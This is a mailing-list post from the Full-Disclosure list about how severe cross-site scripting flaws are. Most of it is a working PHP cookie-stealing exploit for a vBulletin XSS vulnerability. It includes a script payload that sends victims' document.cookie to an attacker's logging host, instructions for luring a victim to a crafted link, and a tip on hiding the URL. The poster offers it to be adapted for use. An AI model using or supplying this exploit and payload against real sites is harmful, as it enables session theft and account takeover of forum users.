Re: Search Engine XSS

["bobby manly" <bobbymanly () hotmail com>]

> So why not show one of these legitimate examples instead of the overused 
> window popup script?
>
> It would just be easier to ascertain the level of severity if an actual DoS 
> string or this "trusted internal call" was exploited.
>
> I am sure there are a lot of forms that can be a victim of a xss string, 
> but how many of them can actually be used for anything useful (from an 
> attacker point of view)?

XSS can be used for a few different things, one of which would be to steal 
cookies / logins

(please read cgisecurity.com stuff.. )

i believe some of the reason dat w00d gets so much shit is because some of 
those XSS don't mean shit unless it targets an admin that is somehow logged 
in with valid stuffz in his cookie (but i did learn some other cool iframe 
stuff from him (and others) so _i_ don't give him shit))(did i miss a ')'?) 
. heh

anyways, there are some web stuff that stores to much stuff in the cookie 
(or insecurely) such as logins,

so you can do a document.location and add the document.cookie as variables 
... and send his cookie somewhere (usually have to get them to click a link 
on site, in email, etc) and you can have a nice lil php to grab cookie 
content and then redirect to a new site..  here is some code that has helped 
me to lurn.. it's not specific to this vbulletin exploit (well kinda).. here 
is what was posted to the net, you will have to modify to fit your needs.. 
credits in the code :

---------------------------
<?PHP
     // vBulletin XSS Injection Vulnerability: Exploit
     // ---
     // Coded By : Sp.IC (SpeedICNet () Hotmail Com).
     // Descrption: Fetching vBulletin's cookies and storing it into a log 
file.

     // Variables:

     $LogFile = "Cookies.Log";

     // Functions:
     /*
     If ($HTTP_GET_VARS['Action'] = "Log") {
         $Header = "<!--";
         $Footer = "--->";
     }
     Else {

          $Header = "";
          $Footer = "";
     }
     Print ($Header);
     */
     Print ("<Title>vBulletin XSS Injection Vulnerability: 
Exploit</Title>");
     Print ("<Pre>");
     Print ("<Center>");
     Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
     Print ("Coded By: <B><A 
Href=\"MailTo:SpeedICNet () Hotmail Com\">Sp.IC</A></B><Hr Width=\"20%\">");
     /*
     Print ($Footer);
     */

     Switch ($HTTP_GET_VARS['Action']) {
         Case "Log":

                $Data = $HTTP_GET_VARS['Cookie'];
                $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen 
(DecHex (MD5 (NULL))))));
                $Log = FOpen ($LogFile, "a+");
                        FWrite ($Log, Trim ($Data) . "\n");
                        FClose ($Log);
                        Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; 
URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
         Break;
               Case "List":
                If (!File_Exists ($LogFile) || !In_Array ($Records)) {
                    Print ("<Br><Br><B>There are No 
Records</B></Center></Pre>");
                    Exit ();
                }
                Else {
                    Print ("</Center></Pre>");
                    $Records = Array_UniQue (File ($LogFile));
                                 Print ("<Pre>");
                                 Print ("<B>.:: Statics</B>\n");
                    Print ("\n");
                                 Print ("o Logged Records : <B>" . Count 
(File ($LogFile)) . "</B>\n");
                    Print ("o Listed Records : <B>" . Count ($Records) . " 
</B>[Not Counting Duplicates]\n");
                    Print ("\n");

                    Print ("<B>.:: Options</B>\n");
                    Print ("\n");

                    If (Count (File ($LogFile)) > 0) {
                        $Link['Download'] = "[<A Href=\"" . $LogFile . 
"\">Download</A>]";
                    }
                    Else{
                        $Link['Download'] = "[No Records in Log]";
                    }

                    Print ("o Download Log : " . $Link['Download'] . "\n");
                    Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH. 
"?Action=Delete\">Y</A>]\n");
                    Print ("\n");
                    Print ("<B>.:: Records</B>\n");
                    Print ("\n");

                    While (List ($Line[0], $Line[1]) = Each ($Records)) {
                        Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
                    }
                }

                Print ("</Pre>");
         Break;
         Case "Delete":
             @UnLink ($LogFile);
             Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or 
Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
             Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . 
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
         Break;
     }
   ?>

- Give a victim this link: 
member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]

- Note: You can replace [Script Code] with: 
--><Script>location='Http://[Exploit 
Path]?Action=Log&Cookie='+(document.cookie);</Script>

- Then go to Http://[Exploit Path]?Action=List

--------------------------------



what's funny, is that @ the time this came out, there was also script 
injection possible in the <b> tag of the actual forum message, so you could 
do some

OnMouse.over junk to help hide the actual url .. heh


..  i would say any XSS would be worth a look.. but not all will actually 
get you shit


later,

kid

_________________________________________________________________
The new MSN 8: advanced junk mail protection and 2 months FREE*  
http://join.msn.com/?page=features/junkmail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html